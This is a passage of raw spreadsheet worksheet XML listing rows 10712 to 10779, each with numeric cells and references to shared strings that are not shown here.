      <c r="D10712" s="2">
        <v>1.0</v>
      </c>
      <c r="E10712" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10712" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="10713" ht="15.75" customHeight="1">
      <c r="A10713" s="1">
        <v>5607.0</v>
      </c>
      <c r="B10713" s="2">
        <v>4.614432E7</v>
      </c>
      <c r="C10713" s="2" t="s">
        <v>10263</v>
      </c>
      <c r="D10713" s="2">
        <v>1.0</v>
      </c>
      <c r="E10713" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10713" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="10714" ht="15.75" customHeight="1">
      <c r="A10714" s="1">
        <v>5650.0</v>
      </c>
      <c r="B10714" s="2">
        <v>4.6286945E7</v>
      </c>
      <c r="C10714" s="2" t="s">
        <v>10264</v>
      </c>
      <c r="D10714" s="2">
        <v>1.0</v>
      </c>
      <c r="E10714" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10714" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="10715" ht="15.75" customHeight="1">
      <c r="A10715" s="1">
        <v>6297.0</v>
      </c>
      <c r="B10715" s="2">
        <v>4.8213238E7</v>
      </c>
      <c r="C10715" s="2" t="s">
        <v>10265</v>
      </c>
      <c r="D10715" s="2">
        <v>1.0</v>
      </c>
      <c r="E10715" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10715" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="10716" ht="15.75" customHeight="1">
      <c r="A10716" s="1">
        <v>6467.0</v>
      </c>
      <c r="B10716" s="2">
        <v>4.8638932E7</v>
      </c>
      <c r="C10716" s="2" t="s">
        <v>10266</v>
      </c>
      <c r="D10716" s="2">
        <v>1.0</v>
      </c>
      <c r="E10716" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10716" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="10717" ht="15.75" customHeight="1">
      <c r="A10717" s="1">
        <v>7121.0</v>
      </c>
      <c r="B10717" s="2">
        <v>5.0403464E7</v>
      </c>
      <c r="C10717" s="2" t="s">
        <v>10267</v>
      </c>
      <c r="D10717" s="2">
        <v>1.0</v>
      </c>
      <c r="E10717" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10717" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="10718" ht="15.75" customHeight="1">
      <c r="A10718" s="1">
        <v>7151.0</v>
      </c>
      <c r="B10718" s="2">
        <v>5.0464054E7</v>
      </c>
      <c r="C10718" s="2" t="s">
        <v>10268</v>
      </c>
      <c r="D10718" s="2">
        <v>1.0</v>
      </c>
      <c r="E10718" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10718" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="10719" ht="15.75" customHeight="1">
      <c r="A10719" s="1">
        <v>7450.0</v>
      </c>
      <c r="B10719" s="2">
        <v>5.1235362E7</v>
      </c>
      <c r="C10719" s="2" t="s">
        <v>10269</v>
      </c>
      <c r="D10719" s="2">
        <v>1.0</v>
      </c>
      <c r="E10719" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10719" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="10720" ht="15.75" customHeight="1">
      <c r="A10720" s="1">
        <v>7460.0</v>
      </c>
      <c r="B10720" s="2">
        <v>5.1249525E7</v>
      </c>
      <c r="C10720" s="2" t="s">
        <v>10270</v>
      </c>
      <c r="D10720" s="2">
        <v>1.0</v>
      </c>
      <c r="E10720" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10720" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="10721" ht="15.75" customHeight="1">
      <c r="A10721" s="1">
        <v>7631.0</v>
      </c>
      <c r="B10721" s="2">
        <v>5175971.0</v>
      </c>
      <c r="C10721" s="2" t="s">
        <v>10271</v>
      </c>
      <c r="D10721" s="2">
        <v>1.0</v>
      </c>
      <c r="E10721" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10721" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="10722" ht="15.75" customHeight="1">
      <c r="A10722" s="1">
        <v>7654.0</v>
      </c>
      <c r="B10722" s="2">
        <v>5.1791126E7</v>
      </c>
      <c r="C10722" s="2" t="s">
        <v>10272</v>
      </c>
      <c r="D10722" s="2">
        <v>1.0</v>
      </c>
      <c r="E10722" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10722" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="10723" ht="15.75" customHeight="1">
      <c r="A10723" s="1">
        <v>7730.0</v>
      </c>
      <c r="B10723" s="2">
        <v>5.2034556E7</v>
      </c>
      <c r="C10723" s="2" t="s">
        <v>10273</v>
      </c>
      <c r="D10723" s="2">
        <v>1.0</v>
      </c>
      <c r="E10723" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10723" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="10724" ht="15.75" customHeight="1">
      <c r="A10724" s="1">
        <v>7751.0</v>
      </c>
      <c r="B10724" s="2">
        <v>5.2087E7</v>
      </c>
      <c r="C10724" s="2" t="s">
        <v>10274</v>
      </c>
      <c r="D10724" s="2">
        <v>1.0</v>
      </c>
      <c r="E10724" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10724" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="10725" ht="15.75" customHeight="1">
      <c r="A10725" s="1">
        <v>8150.0</v>
      </c>
      <c r="B10725" s="2">
        <v>5.3172263E7</v>
      </c>
      <c r="C10725" s="2" t="s">
        <v>10275</v>
      </c>
      <c r="D10725" s="2">
        <v>1.0</v>
      </c>
      <c r="E10725" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10725" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="10726" ht="15.75" customHeight="1">
      <c r="A10726" s="1">
        <v>8649.0</v>
      </c>
      <c r="B10726" s="2">
        <v>5.4349844E7</v>
      </c>
      <c r="C10726" s="2" t="s">
        <v>10276</v>
      </c>
      <c r="D10726" s="2">
        <v>1.0</v>
      </c>
      <c r="E10726" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10726" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="10727" ht="15.75" customHeight="1">
      <c r="A10727" s="1">
        <v>8675.0</v>
      </c>
      <c r="B10727" s="2">
        <v>5.4383554E7</v>
      </c>
      <c r="C10727" s="2" t="s">
        <v>10277</v>
      </c>
      <c r="D10727" s="2">
        <v>1.0</v>
      </c>
      <c r="E10727" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10727" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="10728" ht="15.75" customHeight="1">
      <c r="A10728" s="1">
        <v>8793.0</v>
      </c>
      <c r="B10728" s="2">
        <v>5.4601717E7</v>
      </c>
      <c r="C10728" s="2" t="s">
        <v>10278</v>
      </c>
      <c r="D10728" s="2">
        <v>1.0</v>
      </c>
      <c r="E10728" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10728" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="10729" ht="15.75" customHeight="1">
      <c r="A10729" s="1">
        <v>8826.0</v>
      </c>
      <c r="B10729" s="2">
        <v>5.4651189E7</v>
      </c>
      <c r="C10729" s="2" t="s">
        <v>10279</v>
      </c>
      <c r="D10729" s="2">
        <v>1.0</v>
      </c>
      <c r="E10729" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10729" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="10730" ht="15.75" customHeight="1">
      <c r="A10730" s="1">
        <v>8886.0</v>
      </c>
      <c r="B10730" s="2">
        <v>5.4783401E7</v>
      </c>
      <c r="C10730" s="2" t="s">
        <v>10280</v>
      </c>
      <c r="D10730" s="2">
        <v>1.0</v>
      </c>
      <c r="E10730" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10730" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="10731" ht="15.75" customHeight="1">
      <c r="A10731" s="1">
        <v>9504.0</v>
      </c>
      <c r="B10731" s="2">
        <v>5.5934794E7</v>
      </c>
      <c r="C10731" s="2" t="s">
        <v>10281</v>
      </c>
      <c r="D10731" s="2">
        <v>1.0</v>
      </c>
      <c r="E10731" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10731" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="10732" ht="15.75" customHeight="1">
      <c r="A10732" s="1">
        <v>9794.0</v>
      </c>
      <c r="B10732" s="2">
        <v>5.6534684E7</v>
      </c>
      <c r="C10732" s="2" t="s">
        <v>10282</v>
      </c>
      <c r="D10732" s="2">
        <v>1.0</v>
      </c>
      <c r="E10732" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10732" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="10733" ht="15.75" customHeight="1">
      <c r="A10733" s="1">
        <v>9948.0</v>
      </c>
      <c r="B10733" s="2">
        <v>5.6889719E7</v>
      </c>
      <c r="C10733" s="2" t="s">
        <v>10283</v>
      </c>
      <c r="D10733" s="2">
        <v>1.0</v>
      </c>
      <c r="E10733" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10733" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="10734" ht="15.75" customHeight="1">
      <c r="A10734" s="1">
        <v>9962.0</v>
      </c>
      <c r="B10734" s="2">
        <v>5.6929233E7</v>
      </c>
      <c r="C10734" s="2" t="s">
        <v>10284</v>
      </c>
      <c r="D10734" s="2">
        <v>1.0</v>
      </c>
      <c r="E10734" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10734" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="10735" ht="15.75" customHeight="1">
      <c r="A10735" s="1">
        <v>10463.0</v>
      </c>
      <c r="B10735" s="2">
        <v>1.0777653E7</v>
      </c>
      <c r="C10735" s="2" t="s">
        <v>10285</v>
      </c>
      <c r="D10735" s="2">
        <v>1.0</v>
      </c>
      <c r="E10735" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10735" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="10736" ht="15.75" customHeight="1">
      <c r="A10736" s="1">
        <v>10647.0</v>
      </c>
      <c r="B10736" s="2">
        <v>1.4148418E7</v>
      </c>
      <c r="C10736" s="2" t="s">
        <v>10286</v>
      </c>
      <c r="D10736" s="2">
        <v>1.0</v>
      </c>
      <c r="E10736" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10736" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="10737" ht="15.75" customHeight="1">
      <c r="A10737" s="1">
        <v>11617.0</v>
      </c>
      <c r="B10737" s="2">
        <v>2.307042E7</v>
      </c>
      <c r="C10737" s="2" t="s">
        <v>10287</v>
      </c>
      <c r="D10737" s="2">
        <v>1.0</v>
      </c>
      <c r="E10737" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10737" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="10738" ht="15.75" customHeight="1">
      <c r="A10738" s="1">
        <v>11702.0</v>
      </c>
      <c r="B10738" s="2">
        <v>2.3518812E7</v>
      </c>
      <c r="C10738" s="2" t="s">
        <v>10288</v>
      </c>
      <c r="D10738" s="2">
        <v>1.0</v>
      </c>
      <c r="E10738" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10738" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="10739" ht="15.75" customHeight="1">
      <c r="A10739" s="1">
        <v>11967.0</v>
      </c>
      <c r="B10739" s="2">
        <v>2.569718E7</v>
      </c>
      <c r="C10739" s="2" t="s">
        <v>10289</v>
      </c>
      <c r="D10739" s="2">
        <v>1.0</v>
      </c>
      <c r="E10739" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10739" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="10740" ht="15.75" customHeight="1">
      <c r="A10740" s="1">
        <v>12026.0</v>
      </c>
      <c r="B10740" s="2">
        <v>2.6127204E7</v>
      </c>
      <c r="C10740" s="2" t="s">
        <v>10290</v>
      </c>
      <c r="D10740" s="2">
        <v>1.0</v>
      </c>
      <c r="E10740" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10740" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="10741" ht="15.75" customHeight="1">
      <c r="A10741" s="1">
        <v>12509.0</v>
      </c>
      <c r="B10741" s="2">
        <v>2.9641394E7</v>
      </c>
      <c r="C10741" s="2" t="s">
        <v>10291</v>
      </c>
      <c r="D10741" s="2">
        <v>1.0</v>
      </c>
      <c r="E10741" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10741" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="10742" ht="15.75" customHeight="1">
      <c r="A10742" s="1">
        <v>12804.0</v>
      </c>
      <c r="B10742" s="2">
        <v>3.147587E7</v>
      </c>
      <c r="C10742" s="2" t="s">
        <v>10292</v>
      </c>
      <c r="D10742" s="2">
        <v>1.0</v>
      </c>
      <c r="E10742" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10742" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="10743" ht="15.75" customHeight="1">
      <c r="A10743" s="1">
        <v>12894.0</v>
      </c>
      <c r="B10743" s="2">
        <v>3.2059114E7</v>
      </c>
      <c r="C10743" s="2" t="s">
        <v>10293</v>
      </c>
      <c r="D10743" s="2">
        <v>1.0</v>
      </c>
      <c r="E10743" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10743" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="10744" ht="15.75" customHeight="1">
      <c r="A10744" s="1">
        <v>13079.0</v>
      </c>
      <c r="B10744" s="2">
        <v>3.3358399E7</v>
      </c>
      <c r="C10744" s="2" t="s">
        <v>10294</v>
      </c>
      <c r="D10744" s="2">
        <v>1.0</v>
      </c>
      <c r="E10744" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10744" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="10745" ht="15.75" customHeight="1">
      <c r="A10745" s="1">
        <v>13570.0</v>
      </c>
      <c r="B10745" s="2">
        <v>3.5728209E7</v>
      </c>
      <c r="C10745" s="2" t="s">
        <v>10295</v>
      </c>
      <c r="D10745" s="2">
        <v>1.0</v>
      </c>
      <c r="E10745" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10745" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="10746" ht="15.75" customHeight="1">
      <c r="A10746" s="1">
        <v>13725.0</v>
      </c>
      <c r="B10746" s="2">
        <v>3.6360656E7</v>
      </c>
      <c r="C10746" s="2" t="s">
        <v>10296</v>
      </c>
      <c r="D10746" s="2">
        <v>1.0</v>
      </c>
      <c r="E10746" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10746" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="10747" ht="15.75" customHeight="1">
      <c r="A10747" s="1">
        <v>14051.0</v>
      </c>
      <c r="B10747" s="2">
        <v>3.7530513E7</v>
      </c>
      <c r="C10747" s="2" t="s">
        <v>10297</v>
      </c>
      <c r="D10747" s="2">
        <v>1.0</v>
      </c>
      <c r="E10747" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10747" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="10748" ht="15.75" customHeight="1">
      <c r="A10748" s="1">
        <v>14202.0</v>
      </c>
      <c r="B10748" s="2">
        <v>3.8233122E7</v>
      </c>
      <c r="C10748" s="2" t="s">
        <v>10298</v>
      </c>
      <c r="D10748" s="2">
        <v>1.0</v>
      </c>
      <c r="E10748" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10748" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="10749" ht="15.75" customHeight="1">
      <c r="A10749" s="1">
        <v>14931.0</v>
      </c>
      <c r="B10749" s="2">
        <v>4.1219986E7</v>
      </c>
      <c r="C10749" s="2" t="s">
        <v>10299</v>
      </c>
      <c r="D10749" s="2">
        <v>1.0</v>
      </c>
      <c r="E10749" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10749" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="10750" ht="15.75" customHeight="1">
      <c r="A10750" s="1">
        <v>15235.0</v>
      </c>
      <c r="B10750" s="2">
        <v>4.2251383E7</v>
      </c>
      <c r="C10750" s="2" t="s">
        <v>10300</v>
      </c>
      <c r="D10750" s="2">
        <v>1.0</v>
      </c>
      <c r="E10750" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10750" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="10751" ht="15.75" customHeight="1">
      <c r="A10751" s="1">
        <v>15281.0</v>
      </c>
      <c r="B10751" s="2">
        <v>4.2400766E7</v>
      </c>
      <c r="C10751" s="2" t="s">
        <v>10301</v>
      </c>
      <c r="D10751" s="2">
        <v>1.0</v>
      </c>
      <c r="E10751" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10751" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="10752" ht="15.75" customHeight="1">
      <c r="A10752" s="1">
        <v>15501.0</v>
      </c>
      <c r="B10752" s="2">
        <v>4.3216474E7</v>
      </c>
      <c r="C10752" s="2" t="s">
        <v>10302</v>
      </c>
      <c r="D10752" s="2">
        <v>1.0</v>
      </c>
      <c r="E10752" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10752" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="10753" ht="15.75" customHeight="1">
      <c r="A10753" s="1">
        <v>15611.0</v>
      </c>
      <c r="B10753" s="2">
        <v>4.3515056E7</v>
      </c>
      <c r="C10753" s="2" t="s">
        <v>10303</v>
      </c>
      <c r="D10753" s="2">
        <v>1.0</v>
      </c>
      <c r="E10753" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10753" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="10754" ht="15.75" customHeight="1">
      <c r="A10754" s="1">
        <v>15791.0</v>
      </c>
      <c r="B10754" s="2">
        <v>4.4208931E7</v>
      </c>
      <c r="C10754" s="2" t="s">
        <v>10304</v>
      </c>
      <c r="D10754" s="2">
        <v>1.0</v>
      </c>
      <c r="E10754" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10754" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="10755" ht="15.75" customHeight="1">
      <c r="A10755" s="1">
        <v>16371.0</v>
      </c>
      <c r="B10755" s="2">
        <v>4.6150117E7</v>
      </c>
      <c r="C10755" s="2" t="s">
        <v>10305</v>
      </c>
      <c r="D10755" s="2">
        <v>1.0</v>
      </c>
      <c r="E10755" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10755" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="10756" ht="15.75" customHeight="1">
      <c r="A10756" s="1">
        <v>16372.0</v>
      </c>
      <c r="B10756" s="2">
        <v>4.6154754E7</v>
      </c>
      <c r="C10756" s="2" t="s">
        <v>10306</v>
      </c>
      <c r="D10756" s="2">
        <v>1.0</v>
      </c>
      <c r="E10756" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10756" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="10757" ht="15.75" customHeight="1">
      <c r="A10757" s="1">
        <v>16804.0</v>
      </c>
      <c r="B10757" s="2">
        <v>4.7789573E7</v>
      </c>
      <c r="C10757" s="2" t="s">
        <v>10307</v>
      </c>
      <c r="D10757" s="2">
        <v>1.0</v>
      </c>
      <c r="E10757" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10757" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="10758" ht="15.75" customHeight="1">
      <c r="A10758" s="1">
        <v>16824.0</v>
      </c>
      <c r="B10758" s="2">
        <v>4.7872728E7</v>
      </c>
      <c r="C10758" s="2" t="s">
        <v>10308</v>
      </c>
      <c r="D10758" s="2">
        <v>1.0</v>
      </c>
      <c r="E10758" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10758" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="10759" ht="15.75" customHeight="1">
      <c r="A10759" s="1">
        <v>16915.0</v>
      </c>
      <c r="B10759" s="2">
        <v>4.8129446E7</v>
      </c>
      <c r="C10759" s="2" t="s">
        <v>10309</v>
      </c>
      <c r="D10759" s="2">
        <v>1.0</v>
      </c>
      <c r="E10759" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10759" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="10760" ht="15.75" customHeight="1">
      <c r="A10760" s="1">
        <v>17182.0</v>
      </c>
      <c r="B10760" s="2">
        <v>4.8906162E7</v>
      </c>
      <c r="C10760" s="2" t="s">
        <v>10310</v>
      </c>
      <c r="D10760" s="2">
        <v>1.0</v>
      </c>
      <c r="E10760" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10760" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="10761" ht="15.75" customHeight="1">
      <c r="A10761" s="1">
        <v>17218.0</v>
      </c>
      <c r="B10761" s="2">
        <v>4.9057785E7</v>
      </c>
      <c r="C10761" s="2" t="s">
        <v>10311</v>
      </c>
      <c r="D10761" s="2">
        <v>1.0</v>
      </c>
      <c r="E10761" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10761" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="10762" ht="15.75" customHeight="1">
      <c r="A10762" s="1">
        <v>17653.0</v>
      </c>
      <c r="B10762" s="2">
        <v>5.0430434E7</v>
      </c>
      <c r="C10762" s="2" t="s">
        <v>10312</v>
      </c>
      <c r="D10762" s="2">
        <v>1.0</v>
      </c>
      <c r="E10762" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10762" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="10763" ht="15.75" customHeight="1">
      <c r="A10763" s="1">
        <v>17790.0</v>
      </c>
      <c r="B10763" s="2">
        <v>5.0795136E7</v>
      </c>
      <c r="C10763" s="2" t="s">
        <v>10313</v>
      </c>
      <c r="D10763" s="2">
        <v>1.0</v>
      </c>
      <c r="E10763" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10763" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="10764" ht="15.75" customHeight="1">
      <c r="A10764" s="1">
        <v>18136.0</v>
      </c>
      <c r="B10764" s="2">
        <v>5.1814187E7</v>
      </c>
      <c r="C10764" s="2" t="s">
        <v>10314</v>
      </c>
      <c r="D10764" s="2">
        <v>1.0</v>
      </c>
      <c r="E10764" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10764" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="10765" ht="15.75" customHeight="1">
      <c r="A10765" s="1">
        <v>18306.0</v>
      </c>
      <c r="B10765" s="2">
        <v>5.2371982E7</v>
      </c>
      <c r="C10765" s="2" t="s">
        <v>10315</v>
      </c>
      <c r="D10765" s="2">
        <v>1.0</v>
      </c>
      <c r="E10765" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10765" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="10766" ht="15.75" customHeight="1">
      <c r="A10766" s="1">
        <v>18323.0</v>
      </c>
      <c r="B10766" s="2">
        <v>5.2401591E7</v>
      </c>
      <c r="C10766" s="2" t="s">
        <v>10316</v>
      </c>
      <c r="D10766" s="2">
        <v>1.0</v>
      </c>
      <c r="E10766" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10766" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="10767" ht="15.75" customHeight="1">
      <c r="A10767" s="1">
        <v>18397.0</v>
      </c>
      <c r="B10767" s="2">
        <v>5.2617921E7</v>
      </c>
      <c r="C10767" s="2" t="s">
        <v>10317</v>
      </c>
      <c r="D10767" s="2">
        <v>1.0</v>
      </c>
      <c r="E10767" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10767" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="10768" ht="15.75" customHeight="1">
      <c r="A10768" s="1">
        <v>18459.0</v>
      </c>
      <c r="B10768" s="2">
        <v>5.2830591E7</v>
      </c>
      <c r="C10768" s="2" t="s">
        <v>10318</v>
      </c>
      <c r="D10768" s="2">
        <v>1.0</v>
      </c>
      <c r="E10768" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10768" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="10769" ht="15.75" customHeight="1">
      <c r="A10769" s="1">
        <v>18533.0</v>
      </c>
      <c r="B10769" s="2">
        <v>5.3100155E7</v>
      </c>
      <c r="C10769" s="2" t="s">
        <v>10319</v>
      </c>
      <c r="D10769" s="2">
        <v>1.0</v>
      </c>
      <c r="E10769" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10769" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="10770" ht="15.75" customHeight="1">
      <c r="A10770" s="1">
        <v>18847.0</v>
      </c>
      <c r="B10770" s="2">
        <v>5.3977008E7</v>
      </c>
      <c r="C10770" s="2" t="s">
        <v>10320</v>
      </c>
      <c r="D10770" s="2">
        <v>1.0</v>
      </c>
      <c r="E10770" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10770" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="10771" ht="15.75" customHeight="1">
      <c r="A10771" s="1">
        <v>18876.0</v>
      </c>
      <c r="B10771" s="2">
        <v>5.4067128E7</v>
      </c>
      <c r="C10771" s="2" t="s">
        <v>10321</v>
      </c>
      <c r="D10771" s="2">
        <v>1.0</v>
      </c>
      <c r="E10771" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10771" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="10772" ht="15.75" customHeight="1">
      <c r="A10772" s="1">
        <v>18990.0</v>
      </c>
      <c r="B10772" s="2">
        <v>5.4418961E7</v>
      </c>
      <c r="C10772" s="2" t="s">
        <v>10322</v>
      </c>
      <c r="D10772" s="2">
        <v>1.0</v>
      </c>
      <c r="E10772" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10772" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="10773" ht="15.75" customHeight="1">
      <c r="A10773" s="1">
        <v>18991.0</v>
      </c>
      <c r="B10773" s="2">
        <v>5.4418961E7</v>
      </c>
      <c r="C10773" s="2" t="s">
        <v>10322</v>
      </c>
      <c r="D10773" s="2">
        <v>1.0</v>
      </c>
      <c r="E10773" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10773" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="10774" ht="15.75" customHeight="1">
      <c r="A10774" s="1">
        <v>19466.0</v>
      </c>
      <c r="B10774" s="2">
        <v>5.5777345E7</v>
      </c>
      <c r="C10774" s="2" t="s">
        <v>10323</v>
      </c>
      <c r="D10774" s="2">
        <v>1.0</v>
      </c>
      <c r="E10774" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10774" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="10775" ht="15.75" customHeight="1">
      <c r="A10775" s="1">
        <v>19552.0</v>
      </c>
      <c r="B10775" s="2">
        <v>5.605664E7</v>
      </c>
      <c r="C10775" s="2" t="s">
        <v>10324</v>
      </c>
      <c r="D10775" s="2">
        <v>1.0</v>
      </c>
      <c r="E10775" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10775" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="10776" ht="15.75" customHeight="1">
      <c r="A10776" s="1">
        <v>19675.0</v>
      </c>
      <c r="B10776" s="2">
        <v>5.6394976E7</v>
      </c>
      <c r="C10776" s="2" t="s">
        <v>10325</v>
      </c>
      <c r="D10776" s="2">
        <v>1.0</v>
      </c>
      <c r="E10776" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10776" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="10777" ht="15.75" customHeight="1">
      <c r="A10777" s="1">
        <v>19940.0</v>
      </c>
      <c r="B10777" s="2">
        <v>5.7451525E7</v>
      </c>
      <c r="C10777" s="2" t="s">
        <v>10326</v>
      </c>
      <c r="D10777" s="2">
        <v>1.0</v>
      </c>
      <c r="E10777" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10777" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="10778" ht="15.75" customHeight="1">
      <c r="A10778" s="1">
        <v>20146.0</v>
      </c>
      <c r="B10778" s="2">
        <v>1.0197294E7</v>
      </c>
      <c r="C10778" s="2" t="s">
        <v>10327</v>
      </c>
      <c r="D10778" s="2">
        <v>1.0</v>
      </c>
      <c r="E10778" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10778" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="10779" ht="15.75" customHeight="1">
      <c r="A10779" s="1">
        <v>20283.0</v>
      </c>
      <c r="B10779" s="2">
        <v>1.1173599E7</v>
      </c>
      <c r="C10779" s="2" t="s">
        <v>10328</v>
      </c>
